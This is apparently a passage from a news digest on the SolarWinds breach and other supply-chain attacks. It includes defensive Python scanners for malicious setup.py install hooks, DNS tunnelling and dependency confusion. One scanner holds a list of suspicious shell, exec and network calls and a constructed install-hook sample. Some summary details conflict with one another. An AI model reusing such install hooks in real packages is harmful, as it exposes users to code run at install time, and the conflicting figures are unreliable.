The 2021 Global Cybersecurity Outlook report from VMware Security Business Unit suggests that “island-hopping” attacks are on a rise, in which attackers jump from one network to another along a supply chain, as occurred in the SolarWinds attack. Organizations have to realize that it’s no longer simply about whether breaches along their supply chains can be leveraged to attack them, but whether they themselves can be used to attack their customers.


_______________________________________________________________________________________

(March 9, 2021)


The inside story of the stealthy SolarWinds SUNBURST attack

The SolarWinds attack was performed without weaponizing any zero-day vulnerability known to date. The attackers made their malicious version of the SolarWinds Orion DLL look like a normal version of the software; it was virtually impossible to detect because everything looked official. But as they begin to move through a network by accessing new accounts, the abnormal behavior of the users and devices they operate opens a window of opportunity for detection.

Ref - Varonis 


_______________________________________________________________________________________

(March 9, 2021)


The separate SolarWinds attack described by researchers

Russian hackers apparently weren't the only ones targeting SolarWinds customers. Researchers from Secureworks discovered the 'Spiral' attack on one organization in November 2020, when they spotted hackers exploiting a SolarWinds Orion API vulnerability on an internet-facing SolarWinds server during an incident response effort. Spiral's activities are separate from the SolarWinds supply chain compromise first reported in December 2020.


_______________________________________________________________________________________

(March 9, 2021)


Microsoft released a patch for older versions of Exchange

Microsoft has released security updates for unsupported versions of Exchange email servers following widespread attacks exploiting four newly discovered security vulnerabilities. The security updates for older versions of Exchange only address the four newly disclosed flaws, tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. The issues affect on-premises Exchange servers.

Ref - ZDNet

_______________________________________________________________________________________

(March 9, 2021)


Implications of recent supply chain attacks

The implications of SolarWinds have made all CSOs rethink their approach to cybersecurity. For decades, manufacturing equipment would operate in isolation from public networks to keep adversarial agents from gaining access and potentially disrupting operations. However, as supply chains became more intertwined with operations, third parties were granted access to those systems in order to automate the ordering and fulfillment of maintenance and materials.

Ref - Forbes

_______________________________________________________________________________________

(March 9, 2021)


Analysis of the biggest Python supply chain attack ever

On March 1st, 2021, a newly created account on the Python Package Index (PyPI) uploaded 3591 new packages. Each package had a name that closely resembled the name of another popular package. However, the install-time script only signals to someone that the package was successfully downloaded and installed and does nothing beyond that. This could be the work of a security researcher who wanted to raise awareness about typosquatting supply chain attacks by publishing a lot of fake packages and collecting statistics about how many times each one was downloaded.

Ref - Sogeti

_______________________________________________________________________________________

(March 9, 2021)


More clues appear to link Supernova web shell activity to China

According to Secureworks' new report, the authentication bypass vulnerability in SolarWinds Orion API, tracked as CVE-2020-10148, that can lead to remote execution of API commands, has been actively exploited by Spiral. When vulnerable servers are detected and exploited, a script capable of writing the Supernova web shell to disk is deployed using a PowerShell command.

Ref - TechRadar 

_______________________________________________________________________________________

(March 8, 2021)


‘Retaliation’ for Russia's SolarWinds spying might not be a good idea for the US

Before the US mounts a saber-rattling counterattack, it should pin down exactly what line Russia crossed. Any rule that could justify SolarWinds' retaliation is one that the US also violates with its own cyberespionage. And there's still no evidence that Russia's hacking, in this case, went beyond stealthy intelligence gathering of the sort the US performs routinely around the world.

Ref - Wired 

_______________________________________________________________________________________

(March 8, 2021)


Hackers who hid Supernova malware in SolarWinds Orion linked to China

Intrusion activity related to the Supernova malware, that was planted on compromised SolarWinds Orion installations exposed on the public internet, points to an espionage threat actor based in China. Security researchers named this hacker group ‘Spiral’ and correlated findings from two intrusions in 2020 on the same victim network to determine activity from the same intruder.


_______________________________________________________________________________________

(March 8, 2021)


SolarWinds Breach: Supernova malware linked to a China-based threat group

Secureworks' counter-threat unit (CTU) said that during late 2020, a compromised Internet-facing SolarWinds server was used as a springboard to deploy Supernova, a .NET web shell. Similar intrusions on the same network suggest that the Spiral threat group, suspected of a Chinese origin, is to blame for both cases. According to the researchers, CVE-2020-10148 has been actively exploited by Spiral.

Ref - ZDNet

_______________________________________________________________________________________

(March 8, 2021)


A supply chain attack is targeting the Python community with 4000 fake modules

A user has uploaded 3951 utterly bogus PyPI packages whose names are near-miss variants of the names of several genuine Python packages. None of these fake packages contained outright malware, or indeed any permanent package code at all. However, some of them (if not all) included a Python command that was intended to run when the package was installed, rather than when it was used.

Ref - Sophos
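As an added, defensive example that is not from Sophos or the original post: a small scanner that parses a setup.py with Python's ast module and flags the install-time hook the report describes (a custom install command class) together with shell or exec calls that would run at install rather than import time. Both setup.py texts below are constructed samples, and the list of suspicious calls is an assumption.

```python
import ast

# Calls that have no business in a setup.py (assumption: extend for your environment).
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output", "exec", "eval",
    "urllib.request.urlopen", "socket.socket",
}
# setuptools commands that execute during installation, not during import.
INSTALL_HOOKS = {"install", "develop", "egg_info", "build_py"}

# Constructed sample: a normal package with no install-time behaviour.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="acme-tool", version="1.0.0", packages=find_packages())
'''

# Constructed sample: a near-miss name plus an install hook that runs a command.
SUSPICIOUS_SETUP = '''
import os
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        os.system("echo PLACEHOLDER-INSTALL-TIME-COMMAND")

setup(name="requets-placeholder", version="0.0.1", cmdclass={"install": PostInstall})
'''


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def scan_setup_py(source: str):
    """Return (line, description) findings for install-time execution patterns."""
    findings = []
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, f"call to {name}"))
            # setup(..., cmdclass={"install": ...}) replaces an install-time command.
            if name in ("setup", "setuptools.setup"):
                for kw in node.keywords:
                    if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                        for key in kw.value.keys:
                            if isinstance(key, ast.Constant) and key.value in INSTALL_HOOKS:
                                findings.append((key.lineno, f"cmdclass overrides '{key.value}'"))
        elif isinstance(node, ast.ClassDef):
            # A class deriving from an install command is the usual hook vehicle.
            for base in node.bases:
                bname = _dotted_name(base)
                if bname and bname.split(".")[-1] in INSTALL_HOOKS:
                    findings.append((node.lineno, f"class {node.name} subclasses {bname}"))
    return findings


if __name__ == "__main__":
    for label, text in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, scan_setup_py(text) or "no findings")
```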

_______________________________________________________________________________________

(March 6, 2021)


This new type of supply-chain attack has serious consequences 

A new type of supply chain attack (dubbed Dependency Confusion) unveiled last month is targeting more and more companies, with new rounds this week taking aim at Microsoft, Amazon, Slack, Lyft, Zillow, and an unknown number of others. In weeks past, Apple, Microsoft, Tesla, and 32 other companies were targeted by a similar attack that allowed a security researcher to execute unauthorized code inside their networks.


_______________________________________________________________________________________

(March 5, 2021)


A supply chain attack has breached multiple airlines

A communications and IT vendor for 90 percent of the world’s airlines, SITA, has been breached, compromising passenger data stored on the company’s U.S. servers in what the company is calling a highly sophisticated attack. The affected servers are in Atlanta and belong to the SITA Passenger Service System (SITA PSS).


_______________________________________________________________________________________

(March 5, 2021)


Singapore is the latest victim of supply chain attack

An aviation IT company that says it serves 90% of the world's airlines has been breached in what appears to be a coordinated supply chain attack. Customers of at least four companies - Malaysia Airlines, Singapore Airlines, Finnair Airlines, and Air New Zealand - may have been affected by the incident.


_______________________________________________________________________________________

(March 5, 2021)


Microsoft is now adopting an aggressive strategy for sharing SolarWinds hack intel

Rob Lefferts, corporate vice president for Microsoft 365 Security in Security and Compliance, explains the company's approach to keeping its customers and the industry apprised and updated on its findings from the now-infamous SolarWinds attack. In the wake of a widespread cyberattack, enterprise IT providers can play a key role in how businesses learn about and mitigate the security threat.


_______________________________________________________________________________________

(March 5, 2021)


SolarWinds: 30,000 organizations' email hacked via Microsoft Exchange Server vulnerabilities 

Four exploits found in Microsoft’s Exchange Server software have reportedly led to over 30,000 US governmental and commercial organizations having their emails hacked, according to a report by KrebsOnSecurity. The vulnerabilities allowed hackers to gain access to email accounts, and also gave them the ability to install malware that might let them back into those servers at a later time.

Ref - The Verge

_______________________________________________________________________________________

(March 4, 2021)


Researchers disclosed additional malware linked to SolarWinds attackers

Researchers with Microsoft and FireEye have found three new malware families, named GoldMax, Sibot, and GoldFinder, which they say are used by the threat group behind the SolarWinds attack. The discovery adds to the custom malware already attributed to that group.


_______________________________________________________________________________________

(March 3, 2021)


Malicious code bombs are targeting Amazon, Lyft, Slack, Zillow via supply chain attacks

Attackers have weaponized code dependency confusion to target internal apps at tech giants. Researchers have spotted malicious packages targeting internal applications for Amazon, Lyft, Slack, and Zillow (among others) inside the npm public code repository — all of which exfiltrate sensitive information.


_______________________________________________________________________________________

(March 3, 2021)


SolarWinds breach showed increased sophistication of advanced threat actors

Microsoft has highlighted the increasingly sophisticated cyber-threat landscape, particularly as a result of the rise in nation-state attacks. During a session at the Microsoft Ignite event, the company outlined some of the trends it is seeing and actions it is taking to help mitigate them in the future.


_______________________________________________________________________________________

(March 2, 2021)


SolarWinds breach cost $3.5 million in expenses 

SolarWinds has reported expenses of $3.5 million from last year's supply-chain attack, including costs related to incident investigation and remediation. Further expenses were recorded by SolarWinds after paying for legal, consulting, and other professional services related to the December hack and provided to customers for free.


_______________________________________________________________________________________

(March 1, 2021)


Dependency Confusion is being used to create copycat packages

Sonatype has identified new “dependency confusion” packages published to the npm ecosystem that are malicious in nature. These squatted packages are named after repositories, namespaces, or components used by popular companies such as Amazon, Zillow, Lyft, and Slack.

Ref - Sonatype

_______________________________________________________________________________________

(March 2, 2021)


The SolarWinds hack compromised NASA and FAA

In addition to infiltrating the unclassified networks of seven other US government agencies, the suspected Russian hackers who compromised the IT services firm SolarWinds as a jumping-off point also penetrated NASA and the Federal Aviation Administration. The seven other breached agencies are the Departments of Commerce, Homeland Security, Energy, and State, the US Treasury, the National Institutes of Health, and the Justice Department. The White House said earlier this month that hackers also compromised 100 companies in the spree.

Ref - Wired

_______________________________________________________________________________________

(February 25, 2021)

Microsoft now sharing CodeQL queries for scanning SolarWinds-like implants code

Microsoft has open-sourced CodeQL queries that developers can use to scan source code for malicious implants matching the SolarWinds supply-chain attack. Microsoft created these queries to make sure the attackers had not modified its own code, using them to scan its codebase for malicious implants matching the SolarWinds IOCs.


_______________________________________________________________________________________

(February 25, 2021)


Security experts were blindsided by the SolarWinds attack

The SolarWinds cyberattack on U.S. government agencies and private organizations was and is frightening in its scale and success. It proved no match for the government agencies charged with defending against such things and brought into sharp focus the fact that the government’s current model for responding to cyber threats is lacking. In a sense, the SolarWinds attack seemed designed to exploit a lack of communication and cooperation between government and private-sector security experts.

Ref - Medium

_______________________________________________________________________________________

(February 25, 2021)


SolarWinds hackers take advantage of Amazon Elastic Compute Cloud

Amazon Web Services admitted that hackers used its systems in the SolarWinds campaign but reiterated the cloud computing giant wasn’t itself infected with malware. The actors used EC2 [Amazon Elastic Compute Cloud] just like they would use any server they could buy or use anywhere (on-premises or in the cloud). And, in fact, the actors did use several different service providers in this manner.

Ref - CRN

_______________________________________________________________________________________

(February 24, 2021)


SolarWinds breach is one of the biggest attacks ever - US Senate committee

The United States Senate's select committee on intelligence met to hear evidence from tech executives regarding the historic hack on Texas-based company SolarWinds. The committee heard that both the scale and sophistication of the attack were greater than had been previously thought.


_______________________________________________________________________________________

(February 24, 2021)


More SolarWinds breach victims could still be undisclosed

Microsoft believes that the SolarWinds hackers may have used up to a dozen different means of getting into victims’ networks over the past year, a higher estimate than previously understood. It is likely that more brand-name players were penetrated in the SolarWinds breach but have not been as forthcoming as other victims, leaving policymakers and potential customers in the dark.

Ref - WSJ

_______________________________________________________________________________________

(February 24, 2021)


Important takeaways from the US Senate's hearing of SolarWinds breach

The Senate Intelligence Committee held its first public hearing on the SolarWinds hack, and there are five key takeaways: fingers pointed to Russia as the hack's perpetrator, and companies want the US to hold Russia accountable; Amazon was a no-show despite being invited, and lawmakers weren't happy about it; lawmakers and tech leaders agreed that there should be more robust information-sharing around cyber threats; a new law setting standards for breached companies could be on the horizon; and the hearings showed cooperation between the government and industry.


_______________________________________________________________________________________

(February 24, 2021)


SolarWinds hackers targeted NASA and Federal Aviation Administration networks

Hackers are said to have broken into the networks of U.S. space agency NASA and the Federal Aviation Administration as part of a wider espionage campaign targeting U.S. government agencies and private companies. The two agencies were named by the Washington Post, hours ahead of a Senate Intelligence Committee hearing tasked with investigating the widespread cyberattack.


_______________________________________________________________________________________

(February 24, 2021)


There is substantial evidence of Russian involvement in SolarWinds breach

Microsoft directly blamed Russia's foreign intelligence service for the devastating security breach of at least nine federal agencies and dozens of private businesses, going further than US government officials have to date in their public attribution for the hack. Microsoft President Brad Smith said it would likely take time for the US government to formally reach the same conclusion.

Ref - CNN

_______________________________________________________________________________________

(February 23, 2021)


SolarWinds attackers stayed for several months in FireEye's network

The attackers who infiltrated SolarWinds Orion's software build and updates had spent several months embedded in FireEye's network. The attacker wasn't alive every single day on their network, Kevin Mandia, CEO of FireEye told the US Senate Intelligence Committee in response to a question about the attack time frame on FireEye's network.


_______________________________________________________________________________________

(February 23, 2021)


Finding answers on the SolarWinds breach

Key senators and corporate executives warned at a hearing on SolarWinds breach that the “scope and scale” of the recent hacking of government agencies and companies, the most sophisticated in history, were still unclear. The National Security Agency, despite spending billions of dollars planting sensors in networks around the world, missed the evidence for more than a year.


_______________________________________________________________________________________

(February 23, 2021)


AWS infrastructure was used in SolarWinds hack

Senators slammed Amazon Web Services for refusing to testify at a hearing about the SolarWinds intrusion given the public cloud giant’s infrastructure was used in the attack. Specifically, Amazon Web Services hosted most of the secondary command and control nodes in the SolarWinds attack.

Ref - CRN

_______________________________________________________________________________________

(February 23, 2021)


Mandatory breach disclosure in wake of SolarWinds breach

Lawmakers and witnesses at the Senate Intelligence Committee’s hearing on SolarWinds emphasized the possibility of legislation mandating certain businesses to disclose some breaches to the federal government. Currently, there is no rule mandating a company like FireEye to disclose a breach to the federal government, even when national security is a concern.

Ref - SCMagazine

_______________________________________________________________________________________

(February 23, 2021)


There could be more tech firms besides SolarWinds - used to hack targets

The hackers used a variety of legitimate software and cloud hosting services to access the systems of nine federal agencies and 100 private companies. They used Amazon Web Services cloud hosting to disguise their intrusions as benign network traffic. Additionally, the hackers didn't use the malware planted in SolarWinds' Orion products to breach nearly a third of the victims. Instead, they had access to other hacking techniques, all of which investigators are still unraveling.

Ref - CNET

_______________________________________________________________________________________

(February 23, 2021)


Reasons why SolarWinds was so vulnerable to a hack

SolarWinds outsourced much of its software engineering to cheaper programmers overseas, even though that typically increases the risk of security vulnerabilities. For a while, in 2019, the update server’s password for SolarWinds network management software was reported to be “solarwinds123.” Russian hackers were able to breach SolarWinds' own email system and lurk there for months.


_______________________________________________________________________________________

(February 23, 2021)


Biden administration preparing to sanction Russia for SolarWinds hacks

The Biden administration is preparing sanctions and other measures to punish Moscow for actions that go beyond the sprawling SolarWinds cyber espionage campaign to include a range of malign cyber activity and the near-fatal poisoning of a Russian opposition leader, said U.S. officials familiar with the matter.


_______________________________________________________________________________________

(February 23, 2021)


SolarWinds hack grabs senate spotlight 

The Senate Intelligence Committee, led by Senator Mark Warner, will convene for the first public hearing on the attack, which was disclosed in December. It will hear testimony from Sudhakar Ramakrishna, the president and chief executive officer of SolarWinds, and Microsoft Corp. President Brad Smith, in addition to CrowdStrike Holdings Inc. CEO George Kurtz and Kevin Mandia, CEO of FireEye Inc.

Ref - Bloomberg 

_______________________________________________________________________________________

(February 23, 2021)


The Anatomy of the SolarWinds attack chain

The compromise of identity and manipulation of privileged access was instrumental in the success of the SolarWinds attack. Researchers are trying to deconstruct the attack so organizations can better understand what they’re up against and prioritize efforts to reduce the most risk.

Ref - CyberArk 

_______________________________________________________________________________________

(February 23, 2021)


Top executives from SolarWinds, Microsoft, FireEye, CrowdStrike face Senate grilling

Top executives at Texas-based software company SolarWinds, digital giant Microsoft and cybersecurity firms FireEye and CrowdStrike are expected to defend their companies’ responses to a sprawling series of breaches blamed on Russian hackers when they face the U.S. Senate’s Select Committee on Intelligence.

Ref - Reuters 

_______________________________________________________________________________________

(February 22, 2021)


The U.S. House committee hearing on 'SolarWinds' hack

The U.S. House of Representatives’ Oversight and Homeland Security Committees will hold a joint hearing on 26 February on cybersecurity incidents including the attack targeting SolarWinds Orion Software. Top executives from SolarWinds Corp, FireEye Inc, and Microsoft Corp will testify at the hearing.

Ref - Reuters

_______________________________________________________________________________________

(February 22, 2021)


SolarWinds-like breach could have happened to anyone

In the first of several public appearances, the CEO of SolarWinds is publicly discussing the breach of his company's software two months after reports surfaced that multiple government agencies may have been breached through a backdoor vulnerability. His message to others: this could have happened to anyone.

Ref - FCW

_______________________________________________________________________________________

(February 22, 2021)


Lessons learned from SolarWinds breach 

According to the CEO of SolarWinds, there are three lessons from the recent attack - the first one is how to improve the infrastructure security within the enterprise. The second is how to improve the build infrastructure within the enterprise. The third is, how to improve software development processes and life cycles to the point where they essentially evolve to become secure development lifecycle processes.

Ref - CSIS.org

_______________________________________________________________________________________

(February 22, 2021)


SolarWinds hackers continued attacking Microsoft until January

The SolarWinds hackers continued efforts to infiltrate Microsoft until early January, keeping up the assault even after Microsoft revealed its source code had been compromised. The hackers lost source repository access after Microsoft secured its compromised accounts, but the threat actor kept making unsuccessful attempts to regain access all the way until early January.

Ref - CRN 

_______________________________________________________________________________________

(February 22, 2021)


Researchers expecting another SolarWinds attack

People are too reliant on technology like email to protect themselves with digital walls they’ve long outgrown. There will certainly be another SolarWinds until we remember the more fundamental question of “what does the attacker want?” and work to apply it on all possible platforms.

Ref - SC Mag 

_______________________________________________________________________________________

(February 21, 2021)


National security adviser talks about vows for a quick response to SolarWinds hack

White House national security adviser Jake Sullivan said the White House has asked the intelligence community to do more work to sharpen the attribution made by the Trump administration. This includes details about how the hack occurred, the extent of the damage, and the scope and scale of the breach.

Ref - CBS News 

_______________________________________________________________________________________

(February 20, 2021)


Within weeks, the US will be prepared to take the first steps to respond to SolarWinds attacks

National security adviser Jake Sullivan has said that the US will be taking a series of steps to respond to the devastating SolarWinds cyber hack and hold accountable those responsible within a few weeks instead of months, as anticipated earlier. The Biden administration is focused on identifying more precisely the culprit behind the suspected Russian spying campaign that targeted at least nine federal agencies and at least 100 private-sector businesses.

Ref - CNN 

_______________________________________________________________________________________

(February 19, 2021)


SolarWinds hackers had access to Microsoft source code

The hackers behind the worst intrusion of U.S. government agencies in years won access to Microsoft’s secret source code for authenticating customers, potentially aiding one of their main attack methods. Microsoft had said before that the hackers had accessed some source code, but had not said which parts, or that any had been copied.

Ref - Reuters

_______________________________________________________________________________________

(February 19, 2021)


The scale of the SolarWinds breach is now visible

In a recent interview with CBS News’ 60 Minutes, Microsoft president Brad Smith answered many questions as to the scale of the attack and Microsoft’s unprecedented response to the incident. As to the scale, Smith and many others believe that the attack may have been the largest and most sophisticated the world has seen. Other reports estimate that 18,000 organizations may have been impacted by the attack.

Ref - PCrisk

_______________________________________________________________________________________

(February 18, 2021)


Microsoft recommends zero-trust architecture after SolarWinds attacks

The Microsoft Security Research Center, which has shared learnings and guidance throughout the Solorigate incident, confirmed that following the completion of their internal investigation they found no evidence that Microsoft systems were used to attack others. However, the tech firm recommended that organizations should deploy zero-trust architecture and defense-in-depth protection. 

Ref - Microsoft

_______________________________________________________________________________________

(February 19, 2021)


SolarWinds hackers had access to Microsoft’s secret source code

The hackers behind the intrusion of U.S. government agencies had access to Microsoft’s secret source code for authenticating customers. Some of the code was downloaded, the company said, which would have allowed the hackers even more freedom to hunt for security vulnerabilities, create copies with new flaws, or examine the logic for ways to exploit customer installations.

Ref - Reuters

_______________________________________________________________________________________

(February 18, 2021)


Need of contact tracing approach after SolarWinds breach

According to researchers, the recent SolarWinds breach shows a need for a contact tracing approach for organizations to strengthen their own internal investigations. It can dramatically reduce the time it takes to discover how far an attacker has penetrated into their networks, and identify if other related systems in their supply chains, customers, and partner networks have also been compromised.

Ref - Fortune

_______________________________________________________________________________________

(February 18, 2021)


Microsoft pushes companies toward zero trust after SolarWinds breach

Vasu Jakkal, Microsoft corporate vice president of security, compliance and identity, has said that none of Microsoft’s internal systems were used to attack others because of the zero trust approach followed by the company. The probe also found no evidence of access to Microsoft’s production services or customer data.

Ref - SC Media

_______________________________________________________________________________________

(February 18, 2021)


SolarWinds attackers downloaded Azure and Exchange source code

Microsoft announced that the SolarWinds hackers gained access to source code for a limited number of Azure, Intune, and Exchange components. For a small number of repositories, there was additional access, and downloading of component source code. These repositories contained code for a small subset of Azure components, Intune components, and Exchange components.


_______________________________________________________________________________________

(February 18, 2021)


SolarWinds breach targeted 100 companies and took months of preparation

A White House team leading the investigation into the SolarWinds hack is worried that the breach of 100 US companies has the potential to make the initial compromise a much more serious threat in the future. Anne Neuberger, deputy national security advisor for Cyber and Emerging Technology at the White House, said in a press briefing that nine government agencies were breached, while many of the 100 private sector US organizations that were breached were technology companies.

Ref - ZDNet

_______________________________________________________________________________________

(February 18, 2021)


Efficacy of SolarWinds attack 

The sheer sophistication of the SolarWinds incident is fascinating. At a technical level, it is a multilayered infiltration involving custom malicious tooling, backdoors, and cloaked code, far beyond the skill of script kiddies so often seen exploiting more obvious errors. In addition, it was carried out with code that looked completely benign.


_______________________________________________________________________________________

(February 18, 2021)


White House planning for an executive action after SolarWinds hack

In an update on the investigation into the SolarWinds supply chain attack, Deputy National Security Adviser Anne Neuberger said that the Biden administration is preparing "executive action" to address security shortcomings that have come to light. Neuberger, who was recently named coordinator of the investigation into the attack, made her comments at a White House press briefing.


_______________________________________________________________________________________

(February 18, 2021)


SolarWinds attackers studied Azure’s secret source code

The hackers behind the worst intrusion of U.S. government agencies in years gained access to Microsoft's secret source code for authenticating customers, one of the biggest vectors used in the attacks. Microsoft revealed that its internal investigation had found that the hackers studied parts of the source code instructions for its Azure cloud programs related to identity and security, its Exchange email programs, and Intune management for mobile devices and applications.

Ref - Dell

_______________________________________________________________________________________

(February 18, 2021)


Learnings for the financial services sector from the SolarWinds attacks

The SolarWinds cyber-attack includes some important lessons for financial services institutions of all sizes. A key factor in avoiding a SolarWinds-style breach is operational resilience, which itself depends on having the right strategy. It is crucial to validate the security controls in place and test how effective they are. For this, the financial firms need a SOC that understands the system and monitors the threats, including what type of cyber-attack would be a disaster for the business.


_______________________________________________________________________________________

(February 18, 2020)


The debate on retaliation to SolarWinds breach

Reports came under fire from many infosec professionals, who criticized arguments in favor of launching offensive cyberattacks, also known as hacking back, against SolarWinds breach adversaries. Many infosec experts have warned that hacking back carries enormous risk and should not be part of U.S. cybersecurity policy.


_______________________________________________________________________________________

(February 18, 2021)


Did SolarWinds hack include voice, video, and messaging platforms?

While investigations regarding SolarWinds are ongoing and new information is being revealed on a near-daily basis, there are some concerns regarding any role of an advanced persistent threat to voice, video, and messaging platforms in the SolarWinds attacks. These platforms usually include SIP traffic, API remote access, and RTC, and have been in heavy use since the advent of the COVID-19 epidemic. So any threats to these platforms may lead to another level of catastrophe.

Ref - Medium

_______________________________________________________________________________________

(February 18, 2021)


Hacker behind SolarWinds used U.S. networks

A sprawling cyber-attack that compromised popular software created by Texas-based SolarWinds Corp. was executed from within the U.S., according to a top White House official. The hackers launched the hack from inside the United States, which further made it difficult for the U.S. government to observe their activity.

Ref - Bloomberg

_______________________________________________________________________________________

(February 17, 2021)


An 82% increase observed in SolarWinds-style vendor email compromise attack

Abnormal Security, a next-generation cloud email security company, released a new threat research report that reveals an 82% increase in the chance of companies getting attacked through SolarWinds-style vendor email compromise (VEC) during any given week. The company also found that these attacks can be very costly as it recently detected and stopped a $1.6M VEC attack.

Ref - Yahoo

_______________________________________________________________________________________

(February 17, 2021)


There could be 1,000 developers who had written malicious code used in the SolarWinds breach

Microsoft discovered that the SolarWinds breach was not the work of a small group of threat actors; instead, 1,000+ developers had worked on developing the malicious code in the first place. This implies that the attack was not just widespread but was developed and executed by a much larger group.

Ref - CISOMAG

_______________________________________________________________________________________

(February 17, 2021)


Around 100 private organizations hit by SolarWinds attack

The deputy national security advisor for cyber and emerging technology confirmed that so far nine federal agencies and 100 private industry organizations have been compromised in the SolarWinds attacks. In addition, the attackers waged the attack from inside the US, making it difficult for the US government to observe their activity.


_______________________________________________________________________________________

(February 17, 2021)


Risk of SolarWinds-style attacks through vendor email compromise increased 82%

Abnormal Security has released a new threat research report that reveals an 82% increase in the chance of companies getting attacked through SolarWinds-style vendor email compromise (VEC) during any given week. The company also found that these attacks can be very costly as it recently detected and stopped a $1.6M VEC attack.

Ref - Yahoo 

_______________________________________________________________________________________

(February 16, 2021)


Importance of DNS security after SolarWinds breach

The SolarWinds attack underscores the importance of securing DNS traffic. DNS tunneling, where data is transmitted by appending it to recursive DNS queries, was chosen as the medium to steal customer data. Queries were sent to DNS command and control servers within the same region of breached enterprise networks to evade detection. 

Ref - Akamai
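As an added illustration that is not from Akamai or the original post: a minimal detector for the DNS tunnelling pattern described above, run over constructed query-log lines. It scores each zone on the count, length and entropy of its unique subdomains, so it does not depend on where the C2 server sits (the regional placement the report describes as an evasion); the log format, the zone name and the thresholds are assumptions.

```python
import math
from collections import defaultdict

# Constructed DNS query log (timestamp, client IP, queried name, record type).
# Sample data written for this example; the tunnelling zone is a placeholder,
# not a real SolarWinds/SUNBURST indicator.
SAMPLE_LOG = """\
2021-02-16T10:00:01 10.1.2.3 www.example.com A
2021-02-16T10:00:02 10.1.2.3 mail.example.com MX
2021-02-16T10:00:03 10.1.2.4 cdn.example.com A
2021-02-16T10:00:04 10.1.2.3 k7h2x9q4m1z8w3p6r5t0.tunnel-placeholder.test A
2021-02-16T10:00:05 10.1.2.3 a3f9c1e7b2d4f6a8c0e2.tunnel-placeholder.test A
2021-02-16T10:00:06 10.1.2.3 z1y2x3w4v5u6t7s8r9q0.tunnel-placeholder.test A
2021-02-16T10:00:07 10.1.2.3 m8n7b6v5c4x3z2l1k0j9.tunnel-placeholder.test A
2021-02-16T10:00:08 10.1.2.3 p0o9i8u7y6t5r4e3w2q1.tunnel-placeholder.test A
2021-02-16T10:00:09 10.1.2.5 www.example.com A
"""


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; encoded data scores far above hostnames."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname: str):
    """Split a query name into (zone, subdomain), treating the last two labels
    as the zone. Assumption: a simple heuristic, not a public-suffix lookup."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def parse_log(log_text: str):
    """Yield (client, qname) pairs from whitespace-separated log lines."""
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) >= 3:
            yield fields[1], fields[2]


def zone_stats(log_text: str):
    """Per-zone features: unique subdomains, mean label length, mean entropy."""
    subs = defaultdict(set)
    for _client, qname in parse_log(log_text):
        zone, sub = split_qname(qname)
        subs[zone].add(sub)
    stats = {}
    for zone, names in subs.items():
        stats[zone] = {
            "unique_subdomains": len(names),
            "mean_length": sum(len(s) for s in names) / len(names),
            "mean_entropy": sum(shannon_entropy(s) for s in names) / len(names),
        }
    return stats


def detect_tunnelling(log_text: str, min_unique=4, min_length=16.0, min_entropy=3.5):
    """Return zones whose subdomains look like encoded payloads rather than
    hostnames. Thresholds are assumptions; tune them against your own baseline."""
    flagged = {}
    for zone, s in zone_stats(log_text).items():
        if (s["unique_subdomains"] >= min_unique
                and s["mean_length"] >= min_length
                and s["mean_entropy"] >= min_entropy):
            flagged[zone] = s
    return flagged


if __name__ == "__main__":
    for zone, s in detect_tunnelling(SAMPLE_LOG).items():
        print(f"{zone}: {s['unique_subdomains']} unique subdomains, "
              f"mean length {s['mean_length']:.1f}, mean entropy {s['mean_entropy']:.2f}")
```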

_______________________________________________________________________________________

(February 16, 2021)


Webroot recommendations after the SolarWinds attack

Webroot is offering tips to its MSP and small business customers after the SolarWinds hack: use security technology that includes threat intelligence for URLs, IP addresses, and files as part of a layered cybersecurity approach; follow best practices within policies; ensure devices are set to block high-risk and suspicious objects based on real-time intelligence criteria; and consider adding DNS protection to the technology stack to deepen protection around malicious IP addresses and URLs that are frequently used in attacks.

Ref - Webroot 
 
_______________________________________________________________________________________

(February 16, 2021)


Analysis of SUNBURST malware

FireEye's analysis of the SUNBURST malware disclosed that the attackers hid malicious code within thousands of lines of legitimate code, compiled inside digitally signed binaries. The attackers used the SolarWinds Orion platform for lateral movement traffic. They disabled dozens of endpoint security tools, including FireEye's, and used DNS for Stage 1 and Stage 2 C2 communications. They also introduced minimal custom malware into the environment post-exploitation, often "living off the land" via native Windows tools.

Ref - FireEye

_______________________________________________________________________________________

(February 16, 2021)


A new type of supply-chain attack hit MNCs including Apple and Microsoft

Security researcher Alex Birsan has unveiled a new technique, called Dependency Confusion or namespace confusion, that can execute counterfeit code on networks belonging to some of the most popular enterprise giants, including Apple, Microsoft, and Tesla. By publishing packages with the same names as the internal dependencies used by those companies, Birsan was able to get their systems to download and install the counterfeit code, which could result in a SolarWinds-type supply chain attack.

Ref - Arstechnica 
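The mechanism above, written from the defender's side as an added example (not code from Birsan's research or from the original post): audit a dependency manifest against what the private and public registries would serve, and flag names where a resolver that merges both indexes and takes the highest version would pull the public package. The registries, package names, versions and the "@acme/" private scope are constructed for illustration.

```python
from typing import Dict, Tuple

# Constructed sample data; every package name and version is hypothetical.
# INTERNAL_REGISTRY: packages published only on the company's private feed.
# PUBLIC_REGISTRY: what the public registry currently serves for those names.
# MANIFEST: the dependency names an internal build pulls in.
INTERNAL_REGISTRY: Dict[str, str] = {
    "acme-auth-core": "2.3.1",
    "acme-metrics": "1.0.0",
    "acme-reporting": "3.2.0",
    "@acme/billing": "4.1.0",
}
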